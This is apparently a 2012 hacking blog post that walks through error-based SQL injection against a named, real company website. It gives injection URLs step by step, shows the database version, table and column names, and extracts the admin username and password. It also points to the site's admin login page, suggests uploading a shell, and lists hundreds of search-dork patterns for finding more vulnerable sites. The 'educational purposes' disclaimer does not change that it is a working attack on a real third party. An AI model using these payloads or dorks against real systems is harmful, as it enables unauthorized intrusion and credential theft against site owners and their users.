BASIC HACK

Tuesday 4 September 2012

HOW TO HACK ASPX SITES


 THIS TUTORIAL IS ONLY FOR EDUCATIONAL PURPOSES AND I AM NOT RESPONSIBLE FOR ANYTHING  YOU DO  ILLEGAL
i am going to give a tutorial on how to hack a aspx site.
the procedure are given below

the url in which the attack will be done is:
or
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=1


1st step:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6 ' having 1=1--

it will give the following error


Column 'tbl_PRODUCT.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

it means this site is vulnerable

step2:
to  know the version name type the following command
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6 'and 1=convert(int,@@version)--

output is:
Server Error in '/' Application.
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.5000.00 (Intel X86)
Dec 10 2010 10:56:29
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 6.1 (Build 7601: Service Pack 1)
' to data type int.

here Microsoft SQL Server 2005 - 9.00.5000.00 (Intel X86)
Dec 10 2010 10:56:29 is the version

to know the database name type this
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6 'and 1=convert(int,db_name())--

output:
Conversion failed when converting the nvarchar value 'dbsterlite' to data type int.
dbsterlite is database name

finding username:
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6 'and 1=convert(int,user_name())--

output:
Conversion failed when converting the nvarchar value 'db_hoststerlite' to data type int.


STEP3:
finding table names
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 table_name from information_schema.tables))--

OUTPUT:
Conversion failed when converting the nvarchar value 'tbl_subcategoryname' to data type int
here 1st table is 'tbl_subcategoryname'

then we have to find the 2nd table:

http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('tbl_subcategoryname')))--

OUTPUT:
Conversion failed when converting the nvarchar value 'tbl_testimonials' to data type int.
tbl_testimonials is the 2nd table

for 3rd table
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('tbl_subcategoryname','tbl_testimonials')))--

continue this type of commands until you donot get any types of error
the table are:
1=tbl_subcategoryname
2=tbl_testimonials
3=tbl_News
4=tbl_advertisement
5=tbl_career
6=tbl_category
7=tbl_classified
8=tbl_inquiry
9=tbl_adminmaster
10=tbl_futureproducts
11=tbl_gallery
12=tbl_product
13=tbl_productphoto
14=tbl_quatation


here we want the admin name and password.so the table we needed is
tbl_adminmaster

STEP4:
finding columns name

for 1st table:
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_adminmaster'))--

OUTPUT:
Conversion failed when converting the nvarchar value 'id' to data type int.
1st column is id

for 2nd column:
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_adminmaster' and column_name not in('id')))--

OUTPUT:
Conversion failed when converting the nvarchar value 'username' to data type int.
2nd column is username.

then
http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_adminmaster' and column_name not in('id','username')))--

OUTPUT:
Conversion failed when converting the nvarchar value 'password' to data type int.
continue this type of command until there is no error

fro example if we enter the following command

http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_adminmaster' and column_name not in('id','username','password')))--

the page will load correctly with out any errors
it means  there is only 3 columns in the table 'tbl_adminmaster'.

STEP5:
extracting the information

after getting the required table name and column names,the following commands can be used to extract information

http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 username from tbl_adminmaster))--

OUTPUT:
Conversion failed when converting the varchar value 'admin' to data type int.
here username=admin


http://sterlitelubricants.com/automotive.aspx
?state=viewpage
&id=6'and 1=convert(int,(select top 1 password from tbl_adminmaster))--

OUTPUT:
Conversion failed when converting the varchar value 'admin' to data type int.
password=admin

then you  can find the admin login page by using
'havij'

the admin login page is
http://sterlitelubricants.com/admin/login.aspx

Then after login as admin you can upload your own shell and do whatever you want.Iwill explain how to upload your shell in later tutorials

you can also find this types of vulnerable sites from goole dork
examples:

inurl:.asp?sid=

Code:
".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCate gory ="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID= "
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="

No comments:

Post a Comment